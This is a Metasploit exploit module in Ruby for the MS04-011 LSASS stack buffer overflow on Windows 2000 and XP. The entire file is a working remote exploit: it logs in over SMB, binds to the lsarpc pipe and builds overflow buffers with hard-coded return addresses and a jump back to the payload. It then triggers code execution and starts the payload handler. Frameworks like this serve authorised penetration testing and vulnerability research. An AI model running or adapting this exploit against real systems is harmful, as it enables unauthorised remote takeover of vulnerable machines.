1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  #
10
  # This module exploits a vulnerability in the LSASS service
11
  #
12
  include Msf::Exploit::Remote::DCERPC
13
  include Msf::Exploit::Remote::SMB::Client
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
20
        'Description' => %q{
21
          This module exploits a stack buffer overflow in the LSASS service, this vulnerability
22
          was originally found by eEye. When re-exploiting a Windows XP system, you will need
23
          need to run this module twice. DCERPC request fragmentation can be performed by setting
24
          'FragSize' parameter.
25
        },
26
        'Author' => [ 'hdm' ],
27
        'License' => MSF_LICENSE,
28
        'References' => [
29
          [ 'CVE', '2003-0533' ],
30
          [ 'OSVDB', '5248' ],
31
          [ 'BID', '10108' ],
32
          [ 'MSB', 'MS04-011' ],
33
        ],
34
        'Privileged' => true,
35
        'DefaultOptions' => {
36
          'EXITFUNC' => 'thread'
37
        },
38
        'Payload' => {
39
          'Space' => 1024,
40
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
41
          'StackAdjustment' => -3500,
42
        },
43
        'Platform' => 'win',
44
        'Targets' => [
45
          # Automatic
46
          [
47
            'Automatic Targetting',
48
            {
49
              'Rets' => [ ],
50
            },
51
          ],
52
          # Windows 2000
53
          [
54
            'Windows 2000 English',
55
            {
56
              'Rets' => [ 0x773242e0 ],
57
            },
58
          ],
59
          # Windows XP
60
          [
61
            'Windows XP English',
62
            {
63
              'Rets' => [ 0x7449bf1a ],
64
            },
65
          ],
66
        ],
67
        'DefaultTarget' => 0,
68
        'DisclosureDate' => '2004-04-13',
69
        'Notes' => {
70
          'Reliability' => UNKNOWN_RELIABILITY,
71
          'Stability' => UNKNOWN_STABILITY,
72
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
73
        }
74
      )
75
    )
76

77
    deregister_options('SMB::ProtocolVersion')
78
  end
79

80
  def exploit
81
    connect(versions: [1])
82
    smb_login()
83

84
    handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
85
    print_status("Binding to #{handle}...")
86
    dcerpc_bind(handle)
87
    print_status("Bound to #{handle}...")
88

89
    print_status('Getting OS information...')
90

91
    # Check the remote OS name and version
92
    os = smb_peer_os
93
    buff = ''
94
    case os
95

96
      # Windows 2000 requires that the string be unicode formatted
97
      # and give us a nice set of registers which point back to
98
      # the un-unicoded data. We simply return to a nop sled that
99
      # jumps over the return address, some trash, and into the
100
      # final payload. Easy as pie.
101
    when /Windows 5\.0/
102
      str = rand_text_alphanumeric(3500)
103
      str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
104
      str[2104, payload.encoded.length] = payload.encoded
105
      buff = NDR.UnicodeConformantVaryingString(str)
106

107
      # Windows XP is a bit different, we need to use an ascii
108
      # buffer and a jmp esp. The esp register points to an
109
      # eight byte segment at the end of our buffer in memory,
110
      # we make these bytes jump back to the beginning of the
111
      # buffer, giving us about 1936 bytes of space for a
112
      # payload.
113
    when /Windows 5\.1/
114
      str = rand_text_alphanumeric(7000) + "\x00\x00"
115
      str[0, payload.encoded.length] = payload.encoded
116
      str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
117
      str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
118
      str[6998, 2] = "\x00\x00"
119
      buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
120

121
      # Unsupported target
122
    else
123
      print_status("No target is available for #{os}")
124
      return
125
    end
126

127
    stub = buff +
128
           NDR.long(rand(0xFFFFFF)) +
129
           NDR.UnicodeConformantVaryingString('') +
130
           NDR.UnicodeConformantVaryingString('') +
131
           NDR.UnicodeConformantVaryingString('') +
132
           NDR.UnicodeConformantVaryingString('') +
133
           NDR.long(rand(0xFFFFFF)) +
134
           NDR.UnicodeConformantVaryingString('') +
135
           NDR.long(rand(0xFFFFFF)) +
136
           NDR.UnicodeConformantVaryingString('') +
137
           NDR.long(rand(0xFFFFFF)) +
138
           NDR.UnicodeConformantVaryingString('') +
139
           rand_text(528) +
140
           rand_text(528) +
141
           NDR.long(rand(0xFFFFFF))
142

143
    print_status("Trying to exploit #{os}")
144

145
    begin
146
      response = dcerpc_call(9, stub)
147
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
148
      print_status('Server did not respond, but that should be ok...')
149
    rescue Rex::Proto::DCERPC::Exceptions::Fault
150
      case $!.fault
151
      when 0x1c010002
152
        print_status('Server appears to have been patched')
153
      else
154
        print_status("Unexpected DCERPC fault 0x%.8x" % $!.fault)
155
      end
156
    end
157

158
    # Perform any required client-side payload handling
159
    handler
160
  end
161
end
162

163